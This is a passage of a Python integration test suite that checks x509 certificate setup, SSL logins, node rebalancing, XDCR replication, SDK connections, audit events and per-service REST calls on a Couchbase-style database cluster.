status, ipAddress = subprocess.getstatusoutput("ifconfig en0 | grep 'inet addr:' | cut -d: -f2 |awk '{print $1}'")
if '1' not in ipAddress:
status, ipAddress = subprocess.getstatusoutput("ifconfig eth0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | awk '{print $2}'")
return ipAddress
def createBulkDocuments(self, client):
start_num = 0
end_num = 10000
key1 = 'demo_key'
value1 = {
"name":"demo_value",
"lastname":'lastname',
"areapin":'',
"preference":'veg',
"type":''
}
for x in range (start_num, end_num):
value = value1.copy()
key = 'demo_key'
key = key + str(x)
for key1 in value:
if value[key1] == 'type' and x % 2 == 0:
value['type'] = 'odd'
else:
value['type'] = 'even'
value[key1] = value[key1] + str(x)
value['id'] = str(x)
result = client.upsert(key, value)
def check_rebalance_complete(self, rest):
progress = None
count = 0
while (progress == 'running' or count < 10):
progress = rest._rebalance_progress_status()
self.sleep(10)
count = count + 1
if progress == 'none':
return True
else:
return False
def _sdk_connection(self, root_ca_path=x509main.CACERTFILEPATH + x509main.CACERTFILE, bucket='default', host_ip=None):
self.sleep(10)
result = False
self.add_built_in_server_user([{'id': bucket, 'name': bucket, 'password': 'password'}], \
[{'id': bucket, 'name': bucket, 'roles': 'admin'}], self.master)
self.add_built_in_server_user([{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}], \
[{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}], self.master)
self.sleep(10)
if self.sdk_version == 'pre-vulcan':
connection_string = 'couchbases://' + host_ip + '/' + bucket + '?certpath=' + root_ca_path
self.log.info("Connection string is -{0}".format(connection_string))
try:
cb = Bucket(connection_string, password='password')
if cb is not None:
result = True
return result, cb
except Exception as ex:
self.log.info("Expection is -{0}".format(ex))
elif self.sdk_version == 'vulcan':
key_file = x509main.CACERTFILEPATH + self.ip_address + ".key"
chain_file = x509main.CACERTFILEPATH + "/long_chain" + self.ip_address + ".pem"
connection_string = 'couchbases://' + host_ip + '/?ipv6=allow&certpath=' + chain_file + "&keypath=" + key_file
self.log.info("Connection string is -{0}".format(connection_string))
try:
cluster = Cluster(connection_string);
cb = cluster.open_bucket(bucket)
if cb is not None:
result = True
self.log.info('SDK connection created successfully')
return result, cb
except Exception as ex:
self.log.info("Expection is -{0}".format(ex))
return result
def test_bucket_select_audit(self):
# security.x509tests.x509tests.test_bucket_select_audit
eventID = 20492
mc = MemcachedClient(self.master.ip, 11210)
mc.sasl_auth_plain(self.master.rest_username, self.master.rest_password)
mc.bucket_select('default')
expectedResults = {"bucket":"default","description":"The specified bucket was selected","id":20492,"name":"select bucket" \
,"peername":"127.0.0.1:46539","real_userid":{"domain":"memcached","user":"@ns_server"},"sockname":"127.0.0.1:11209"}
Audit = audit(eventID=eventID, host=self.master)
actualEvent = Audit.returnEvent(eventID)
Audit.validateData(actualEvent, expectedResults)
def test_basic_ssl_test(self):
x509main(self.master).setup_master()
status = x509main(self.master)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_error_without_node_chain_certificates(self):
x509main(self.master)._upload_cluster_ca_certificate("Administrator", 'password')
status, content = x509main(self.master)._reload_node_certificate(self.master)
content = str(content)
self.assertEqual(status['status'], '400', "Issue with status with node certificate are missing")
self.assertTrue('Unable to read certificate chain file' in str(content), "Incorrect message from the system")
def test_error_without_chain_cert(self):
x509main(self.master)._upload_cluster_ca_certificate("Administrator", 'password')
x509main(self.master)._setup_node_certificates(chain_cert=False)
status, content = x509main(self.master)._reload_node_certificate(self.master)
content = str(content)
self.assertEqual(status['status'], '400', "Issue with status with node certificate are missing")
self.assertTrue('Unable to read certificate chain file' in str(content) , "Incorrect message from the system")
def test_error_without_node_key(self):
x509main(self.master)._upload_cluster_ca_certificate("Administrator", 'password')
x509main(self.master)._setup_node_certificates(node_key=False)
status, content = x509main(self.master)._reload_node_certificate(self.master)
self.assertEqual(status['status'], '400', "Issue with status with node key is missing")
self.assertTrue('Unable to read private key file' in content, "Incorrect message from the system")
def test_add_node_without_cert(self):
rest = RestConnection(self.master)
servs_inout = self.servers[1]
x509main(self.master).setup_master()
try:
rest.add_node('Administrator', 'password', servs_inout.ip)
except Exception as ex:
ex = str(ex)
# expected_result = "Error adding node: " + servs_inout.ip + " to the cluster:" + self.master.ip + " - [\"Prepare join failed. Error applying node certificate. Unable to read certificate chain file\"]"
expected_result = "Error adding node: " + servs_inout.ip + " to the cluster:" + self.master.ip
self.assertTrue(expected_result in ex, "Incorrect Error message in exception")
expected_result = "Error applying node certificate. Unable to read certificate chain file"
self.assertTrue(expected_result in ex, "Incorrect Error message in exception")
expected_result = "The file does not exist."
self.assertTrue(expected_result in ex, "Incorrect Error message in exception")
def test_add_node_with_cert(self):
servs_inout = self.servers[1:]
rest = RestConnection(self.master)
for node in servs_inout:
x509main(node).setup_master()
known_nodes = ['ns_1@' + self.master.ip]
for server in servs_inout:
rest.add_node('Administrator', 'password', server.ip)
known_nodes.append('ns_1@' + server.ip)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in self.servers:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_add_remove_add_back_node_with_cert(self, rebalance=None):
rebalance = self.input.param('rebalance')
rest = RestConnection(self.master)
servs_inout = self.servers[1:3]
serv_out = 'ns_1@' + servs_inout[1].ip
known_nodes = ['ns_1@' + self.master.ip]
x509main(self.master).setup_master()
for node in servs_inout:
x509main(node).setup_master()
for server in servs_inout:
rest.add_node('Administrator', 'password', server.ip)
known_nodes.append('ns_1@' + server.ip)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in servs_inout:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
rest.fail_over(serv_out, graceful=False)
if (rebalance):
rest.rebalance(known_nodes, [serv_out])
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
rest.add_node('Administrator', 'password', servs_inout[1].ip)
else:
rest.add_back_node(serv_out)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in servs_inout:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_add_remove_graceful_add_back_node_with_cert(self, recovery_type=None):
recovery_type = self.input.param('recovery_type')
rest = RestConnection(self.master)
known_nodes = ['ns_1@' + self.master.ip]
progress = None
count = 0
servs_inout = self.servers[1:]
serv_out = 'ns_1@' + servs_inout[1].ip
rest.create_bucket(bucket='default', ramQuotaMB=100)
x509main(self.master).setup_master()
for node in servs_inout:
x509main(node).setup_master()
for server in servs_inout:
rest.add_node('Administrator', 'password', server.ip)
known_nodes.append('ns_1@' + server.ip)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in servs_inout:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
rest.fail_over(serv_out, graceful=True)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
rest.set_recovery_type(serv_out, recovery_type)
rest.add_back_node(serv_out)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in servs_inout:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_add_remove_autofailover(self):
rest = RestConnection(self.master)
serv_out = self.servers[3]
shell = RemoteMachineShellConnection(serv_out)
known_nodes = ['ns_1@' + self.master.ip]
rest.create_bucket(bucket='default', ramQuotaMB=100)
rest.update_autofailover_settings(True, 30)
x509main(self.master).setup_master()
for node in self.servers[1:4]:
x509main(node).setup_master()
for server in self.servers[1:4]:
rest.add_node('Administrator', 'password', server.ip)
known_nodes.append('ns_1@' + server.ip)
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
shell.stop_server()
self.sleep(60)
shell.start_server()
self.sleep(30)
for server in self.servers[1:4]:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
def test_add_node_with_cert_non_master(self):
rest = RestConnection(self.master)
for node in self.servers[:3]:
x509main(node).setup_master()
servs_inout = self.servers[1]
rest.add_node('Administrator', 'password', servs_inout.ip)
known_nodes = ['ns_1@' + self.master.ip, 'ns_1@' + servs_inout.ip]
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
rest = RestConnection(self.servers[1])
servs_inout = self.servers[2]
rest.add_node('Administrator', 'password', servs_inout.ip)
known_nodes = ['ns_1@' + self.master.ip, 'ns_1@' + servs_inout.ip, 'ns_1@' + self.servers[1].ip]
rest.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(rest), "Issue with rebalance")
for server in self.servers[:3]:
status = x509main(server)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code for ip - {0}".format(server.ip))
# simple xdcr with ca cert
def test_basic_xdcr_with_cert(self):
cluster1 = self.servers[0:2]
cluster2 = self.servers[2:4]
remote_cluster_name = 'sslcluster'
restCluster1 = RestConnection(cluster1[0])
restCluster2 = RestConnection(cluster2[0])
try:
# Setup cluster1
x509main(cluster1[0]).setup_master()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
restCluster1.create_bucket(bucket='default', ramQuotaMB=100)
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
# Setup cluster2
x509main(cluster2[0]).setup_master()
x509main(cluster2[1])._setup_node_certificates(reload_cert=False)
restCluster2.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(20)
test = x509main.CACERTFILEPATH + x509main.CACERTFILE
data = open(test, 'rb').read()
restCluster1.add_remote_cluster(cluster2[0].ip, cluster2[0].port, 'Administrator', 'password', remote_cluster_name, certificate=data)
self.sleep(20)
replication_id = restCluster1.start_replication('continuous', 'default', remote_cluster_name)
self.assertTrue(replication_id is not None, "Replication was not created successfully")
except Exception as ex:
self.log.info("Exception is -{0}".format(ex))
finally:
restCluster2.delete_bucket()
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
# simple xdcr with ca cert updated at source and destination, re-generate new certs
def test_basic_xdcr_with_cert_regenerate(self):
cluster1 = self.servers[0:2]
cluster2 = self.servers[2:4]
remote_cluster_name = 'sslcluster'
restCluster1 = RestConnection(cluster1[0])
restCluster2 = RestConnection(cluster2[0])
try:
# Setup cluster1
x509main(cluster1[0]).setup_master()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
restCluster1.create_bucket(bucket='default', ramQuotaMB=100)
# Setup cluster2
x509main(cluster2[0]).setup_master()
x509main(cluster2[1])._setup_node_certificates(reload_cert=False)
restCluster2.create_bucket(bucket='default', ramQuotaMB=100)
test = x509main.CACERTFILEPATH + x509main.CACERTFILE
data = open(test, 'rb').read()
restCluster1.add_remote_cluster(cluster2[0].ip, cluster2[0].port, 'Administrator', 'password', remote_cluster_name, certificate=data)
self.sleep(20)
replication_id = restCluster1.start_replication('continuous', 'default', remote_cluster_name)
# restCluster1.set_xdcr_param('default','default','pauseRequested',True)
x509main(self.master)._delete_inbox_folder()
x509main(self.master)._generate_cert(self.servers, type='openssl', root_cn="CB\ Authority", client_ip=self.ip_address)
self.log.info ("Setting up the first cluster for new certificate")
x509main(cluster1[0]).setup_master()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
self.log.info ("Setting up the second cluster for new certificate")
x509main(cluster2[0]).setup_master()
x509main(cluster2[1])._setup_node_certificates(reload_cert=False)
status = restCluster1.is_replication_paused('default', 'default')
if not status:
restCluster1.set_xdcr_param('default', 'default', 'pauseRequested', False)
restCluster1.set_xdcr_param('default', 'default', 'pauseRequested', True)
status = restCluster1.is_replication_paused('default', 'default')
self.assertTrue(status, "Replication has not started after certificate upgrade")
finally:
restCluster2.delete_bucket()
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
# source ca and destination self_signed
def test_xdcr_destination_self_signed_cert(self):
cluster1 = self.servers[0:2]
cluster2 = self.servers[2:4]
remote_cluster_name = 'sslcluster'
restCluster1 = RestConnection(cluster1[0])
restCluster2 = RestConnection(cluster2[0])
try:
# Setup cluster1
x509main(cluster1[0])._upload_cluster_ca_certificate("Administrator", 'password')
x509main(cluster1[0])._setup_node_certificates()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
restCluster1.add_node('Administrator', 'password', cluster1[1].ip)
known_nodes = ['ns_1@' + cluster1[0].ip, 'ns_1@' + cluster1[1].ip]
restCluster1.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(restCluster1), "Issue with rebalance")
restCluster1.create_bucket(bucket='default', ramQuotaMB=100)
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
restCluster2.add_node('Administrator', 'password', cluster2[1].ip)
known_nodes = ['ns_1@' + cluster2[0].ip, 'ns_1@' + cluster2[1].ip]
restCluster2.rebalance(known_nodes)
self.assertTrue(self.check_rebalance_complete(restCluster2), "Issue with rebalance")
restCluster2.create_bucket(bucket='default', ramQuotaMB=100)
test = x509main.CACERTFILEPATH + x509main.CACERTFILE
data = open(test, 'rb').read()
restCluster1.add_remote_cluster(cluster2[0].ip, cluster2[0].port, 'Administrator', 'password', remote_cluster_name, certificate=data)
self.sleep(20)
replication_id = restCluster1.start_replication('continuous', 'default', remote_cluster_name)
            self.assertIsNotNone(replication_id, "Cannot create a replication")
finally:
known_nodes = ['ns_1@' + cluster2[0].ip, 'ns_1@' + cluster2[1].ip]
restCluster2.rebalance(known_nodes, ['ns_1@' + cluster2[1].ip])
self.assertTrue(self.check_rebalance_complete(restCluster2), "Issue with rebalance")
restCluster2.delete_bucket()
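    # create the xdcr remote cluster reference directly over REST, using curl with the client cert/key and root CA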
def test_xdcr_remote_ref_creation(self):
cluster1 = self.servers[0:2]
cluster2 = self.servers[2:4]
remote_cluster_name = 'sslcluster'
restCluster1 = RestConnection(cluster1[0])
restCluster2 = RestConnection(cluster2[0])
user = self.input.param("username", "Administrator")
password = self.input.param("password", "password")
try:
# Setup cluster1
x509main(cluster1[0]).setup_master()
x509main(cluster1[1])._setup_node_certificates(reload_cert=False)
restCluster1.create_bucket(bucket='default', ramQuotaMB=100)
restCluster1.remove_all_replications()
restCluster1.remove_all_remote_clusters()
# Setup cluster2
x509main(cluster2[0]).setup_master()
x509main(cluster2[1])._setup_node_certificates(reload_cert=False)
restCluster2.create_bucket(bucket='default', ramQuotaMB=100)
test = x509main.CACERTFILEPATH + x509main.CACERTFILE
data = open(test, 'rb').read()
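            # build a curl command that posts the remote cluster reference over SSL, authenticating
            # with the client certificate/key and verifying the server against the root CA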
# " -u {0}:{1}".format(user, password) + \
cmd = "curl -k -v -X POST -u Administrator:password" \
" --cacert " + self.root_ca_path + \
" --cert-type PEM --cert " + x509main().CLIENT_CERT_PEM + \
" --key-type PEM --key " + x509main().CLIENT_CERT_KEY + \
" -d name=" + remote_cluster_name + \
" -d hostname=" + cluster2[0].ip + ":" + self.rest_port +\
" -d username=" + user + \
" -d password=" + password + \
" -d demandEncryption=1" \
" --data-urlencode \"certificate={0}\"".format(data) + \
" {0}://Administrator:password@{1}:{2}/pools/default/remoteClusters"\
.format(self.protocol, self.master.ip, self.rest_port)
self.log.info("Command is {0}".format(cmd))
shell = RemoteMachineShellConnection(x509main.SLAVE_HOST)
output = shell.execute_command(cmd)
self.sleep(10)
'''
data = open(test, 'rb').read()
restCluster1.add_remote_cluster(cluster2[0].ip,cluster2[0].port,'Administrator','password',remote_cluster_name,certificate=data)
'''
replication_id = restCluster1.start_replication('continuous', 'default', remote_cluster_name)
            self.assertIsNotNone(replication_id, "Replication was not created successfully")
finally:
restCluster2.delete_bucket()
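    # validate that SSL login to the master node still works after the x509 setup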
def test_basic_ssl_test_invalid_cert(self):
x509main(self.master).setup_master()
status = x509main(self.master)._validate_ssl_login()
self.assertEqual(status, 200, "Not able to login via SSL code")
# test sdk certs on a single node
def test_sdk(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
rest.create_bucket(bucket='default', ramQuotaMB=100)
result = self._sdk_connection(host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# test with sdk cluster using ca certs
def test_sdk_cluster(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
for node in self.servers[1:]:
x509main(node).setup_master()
rest.create_bucket(bucket='default', ramQuotaMB=100)
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Cannot create a security connection with server")
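    # test sdk certs when the nodes are rebalanced into the cluster before certificates are set up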
def test_sdk_existing_cluster(self):
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
rest.create_bucket(bucket='default', ramQuotaMB=100)
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# Incorrect root cert
def test_sdk_cluster_incorrect_cert(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers)
rest.create_bucket(bucket='default', ramQuotaMB=100)
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
root_incorrect_ca_path = x509main.CACERTFILEPATH + x509main.INCORRECT_ROOT_CERT
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip, root_ca_path=root_incorrect_ca_path)
self.assertFalse(result, "Can create a security connection with incorrect root cert")
# Changing from root to self signed certificates
def test_sdk_change_ca_self_signed(self):
rest = RestConnection(self.master)
temp_file_name = x509main.CACERTFILEPATH + '/orig_cert.pem'
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers)
rest.create_bucket(bucket='default', ramQuotaMB=100)
result = self._sdk_connection(host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
rest.regenerate_cluster_certificate()
temp_cert = rest.get_cluster_ceritificate()
temp_file = open(temp_file_name, 'w')
temp_file.write(temp_cert)
temp_file.close()
result = self._sdk_connection(root_ca_path=temp_file_name, host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# Changing from one root crt to another root crt when an existing connections exists
def test_root_crt_rotate_existing_cluster(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
rest.create_bucket(bucket='default', ramQuotaMB=100)
result, cb = self._sdk_connection(host_ip=self.master.ip)
create_docs = Thread(name='create_docs', target=self.createBulkDocuments, args=(cb,))
create_docs.start()
x509main(self.master)._delete_inbox_folder()
        x509main(self.master)._generate_cert(self.servers, root_cn="CB\\ Authority", type='openssl', client_ip=self.ip_address)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
create_docs.join()
result, cb = self._sdk_connection(host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# Changing from one root crt to another root crt when an existing connections exists - cluster
def test_root_crt_rotate_cluster(self):
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers)
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(30)
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Can create a ssl connection with correct certificate")
result, cb = self._sdk_connection(host_ip=self.master.ip)
create_docs = Thread(name='create_docs', target=self.createBulkDocuments, args=(cb,))
create_docs.start()
x509main(self.master)._delete_inbox_folder()
        x509main(self.master)._generate_cert(self.servers, root_cn="CB\\ Authority", type='openssl', client_ip=self.ip_address)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
create_docs.join()
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Can create a ssl connection with correct certificate")
def test_root_crt_rotate_cluster_n2n(self):
update_level = self.input.param('update_level','all')
#ntonencryptionBase().change_cluster_encryption_cli(self.servers, 'control')
#ntonencryptionBase().ntonencryption_cli(self.servers, 'disable')
rest = RestConnection(self.master)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers)
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(30)
servers_in = self.servers[1:]
self.cluster.rebalance(self.servers, servers_in, [])
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Can create a ssl connection with correct certificate")
result, cb = self._sdk_connection(host_ip=self.master.ip)
create_docs = Thread(name='create_docs', target=self.createBulkDocuments, args=(cb,))
create_docs.start()
x509main(self.master)._delete_inbox_folder()
        x509main(self.master)._generate_cert(self.servers, root_cn="CB\\ Authority", type='openssl', client_ip=self.ip_address)
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
create_docs.join()
ntonencryptionBase().ntonencryption_cli(self.servers, 'enable')
ntonencryptionBase().change_cluster_encryption_cli(self.servers, update_level)
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Can create a ssl connection with correct certificate")
# Changing from self signed to ca signed, while there is a connection with self-signed
def test_root_existing_connection_rotate_cert(self):
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=100)
bucket = 'default'
self.add_built_in_server_user([{'id': bucket, 'name': bucket, 'password': 'password'}], \
[{'id': bucket, 'name': bucket, 'roles': 'admin'}], self.master)
self.sleep(30)
result = False
connection_string = 'couchbase://' + self.master.ip + '/default'
try:
cb = Bucket(connection_string, password='password')
if cb is not None:
result = True
except Exception as ex:
self.log.info("Exception is -{0}".format(ex))
self.assertTrue(result, "Cannot create a client connection with server")
create_docs = Thread(name='create_docs', target=self.createBulkDocuments, args=(cb,))
create_docs.start()
x509main(self.master).setup_master()
create_docs.join()
result = self._sdk_connection(host_ip=self.master.ip)
self.assertTrue(result, "Cannot create a security connection with server")
# Audit test to test /UploadClusterCA
def test_audit_upload_ca(self):
x509main(self.master).setup_master()
expectedResults = {"expires":"2049-12-31T23:59:59.000Z", "subject":"CN=Root Authority", "ip":self.ip_address, "port":57457, "source":"ns_server", \
"user":"Administrator"}
self.checkConfig(8229, self.master, expectedResults)
# Audit test for /reloadCA
def test_audit_reload_ca(self):
x509main(self.master).setup_master()
expectedResults = {"expires":"2049-12-31T23:59:59.000Z", "subject":"CN=" + self.master.ip, "ip":self.ip_address, "port":57457, "source":"ns_server", \
"user":"Administrator"}
self.checkConfig(8230, self.master, expectedResults)
# Common test case for testing services and other parameter
def test_add_node_with_cert_diff_services(self):
if self.enable_nton_local:
ntonencryptionBase().ntonencryption_cli(self.servers, 'enable')
ntonencryptionBase().change_cluster_encryption_cli(self.servers, self.local_clusterEncryption)
servs_inout = self.servers[1:4]
rest = RestConnection(self.master)
services_in = []
self.log.info ("list of services to be added {0}".format(self.services_in))
for service in self.services_in.split("-"):
services_in.append(service.split(":")[0])
self.log.info ("list of services to be added after formatting {0}".format(services_in))
for node in servs_inout:
x509main(node).setup_master(self.client_cert_state, self.paths,
self.prefixs, self.delimeters,
self.upload_json_mode)
# add nodes to the cluster
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], servs_inout, [],
services=services_in)
rebalance.result()
self.sleep(20)
# check for analytics services, for Vulcan check on http port
cbas_node = self.get_nodes_from_services_map(service_type='cbas')
if cbas_node is not None:
self.check_analytics_service(cbas_node)
# check if n1ql service, test it end to end
n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
if n1ql_node is not None:
self.check_query_api(n1ql_node)
# check if fts services, test it end to end
fts_node = self.get_nodes_from_services_map(service_type='fts')
if fts_node is not None:
self.check_fts_service(fts_node)
# check for kv service, test for /pools/default
kv_node = self.get_nodes_from_services_map(service_type='kv')
if kv_node is not None:
self.check_ns_server_rest_api(kv_node)
self.check_views_ssl(kv_node)
def check_ns_server_rest_api(self, host):
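        # exercise GET and POST on /pools/default over the SSL port (18091), with client certs or
        # basic auth depending on the client cert state, then repeat over the plain REST port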
rest = RestConnection(host)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(10)
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=True)
else:
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=' -u Administrator:password ', client_cert=False, curl=True)
output = json.loads(output)
self.log.info ("Print output of command is {0}".format(output))
self.assertEqual(output['rebalanceStatus'], 'none', " The Web request has failed on port 18091 ")
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=None, client_cert=True, curl=True, verb='POST', data='memoryQuota=400')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=' -u Administrator:password ', client_cert=False, curl=True, verb='POST', data='memoryQuota=400')
if output == "":
self.assertTrue(True, "Issue with post on /pools/default")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=self.rest_port, headers=" -u Administrator:password ", client_cert=False, curl=True, verb='GET', plain_curl=True)
self.assertEqual(json.loads(output)['rebalanceStatus'], 'none', " The Web request has failed on port 8091 ")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=self.rest_port, headers=" -u Administrator:password ", client_cert=True, curl=True, verb='POST', plain_curl=True, data='memoryQuota=400')
if output == "":
self.assertTrue(True, "Issue with post on /pools/default")
def check_query_api(self, host):
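        # issue CREATE INDEX statements through the query service on the SSL port (18093) and the
        # plain n1ql port, expecting a "success" status for both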
rest = RestConnection(self.master)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(20)
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/query/service', port=18093, headers='', client_cert=True, curl=True, verb='GET', data="statement='create index idx1 on default(name)'")
else:
output = x509main()._execute_command_clientcert(host.ip, url='/query/service', port=18093, headers='-u Administrator:password ', client_cert=False, curl=True, verb='GET', data="statement='create index idx1 on default(name)'")
self.assertEqual(json.loads(output)['status'], "success", "Create Index Failed on port 18093")
output = x509main()._execute_command_clientcert(host.ip, url='/query/service', port=self.n1ql_port, headers='-u Administrator:password ', client_cert=False, curl=True, verb='GET', plain_curl=True, data="statement='create index idx2 on default(name)'")
self.assertEqual(json.loads(output)['status'], "success", "Create Index Failed on port 8093")
def check_fts_service(self, host):
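        # create and delete FTS indexes over the SSL port (18094) and the plain FTS port, then
        # query /api/stats, using client certs or basic auth depending on the client cert state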
rest = RestConnection(self.master)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
fts_ssl_port = 18094
self.sleep(20)
idx = {"sourceName": "default",
"sourceType": "couchbase",
"type": "fulltext-index"}
qry = {"indexName": "default_index_1",
"query": {"field": "type", "match": "emp"},
"size": 10000000}
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx', port=18094, headers=" -XPUT -H \"Content-Type: application/json\" ",
client_cert=True, curl=True, verb='GET', data="'" + json.dumps(idx) + "'")
else:
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx', port=18094, headers=" -XPUT -H \"Content-Type: application/json\" -u Administrator:password ",
client_cert=False, curl=True, verb='GET', data="'" + json.dumps(idx) + "'")
self.assertEqual(json.loads(output)['status'], "ok", "Issue with creating FTS index with client Cert")
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx01', port=self.fts_port, headers=" -XPUT -H \"Content-Type: application/json\" -u Administrator:password ",
client_cert=False, curl=True, verb='GET', data="'" + json.dumps(idx) + "'", plain_curl=True)
self.assertEqual(json.loads(output)['status'], "ok", "Issue with creating FTS index with client Cert")
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx', port=18094, headers=" -H \"Content-Type: application/json\" ",
client_cert=True, curl=True, verb='DELETE')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx', port=18094, headers=" -H \"Content-Type: application/json\" -u Administrator:password ",
client_cert=False, curl=True, verb='DELETE')
self.assertEqual(json.loads(output)['status'], "ok", "Issue with deleteing FTS index with client Cert")
output = x509main()._execute_command_clientcert(host.ip, url='/api/index/default_idx01', port=self.fts_port, headers=" -H \"Content-Type: application/json\" -u Administrator:password ",
client_cert=False, curl=True, verb='DELETE', plain_curl=True)
self.assertEqual(json.loads(output)['status'], "ok", "Issue with deleteing FTS index on 8094")
''' - Check with FTS team on this
if self.client_cert_state == 'enable':
cmd = "curl -v --cacert " + self.root_ca_path + " --cert-type PEM --cert " + self.client_cert_pem + " --key-type PEM --key " + self.client_cert_key + \
" -H \"Content-Type: application/json\" " + \
"https://{0}:{1}/api/index/". \
format(host.ip, fts_ssl_port)
else:
cmd = "curl -v --cacert " + self.root_ca_path + \
" -H \"Content-Type: application/json\" " + \
" -u Administrator:password " + \
"https://{0}:{1}/api/index/". \
format(host.ip, fts_ssl_port)
self.log.info("Running command : {0}".format(cmd))
output = subprocess.check_output(cmd, shell=True)
print json.loads(output)
'''
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/api/stats', port=18094, headers='', client_cert=True, curl=True, verb='GET')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/api/stats', port=18094, headers=' -u Administrator:password ',
client_cert=False, curl=True, verb='GET')
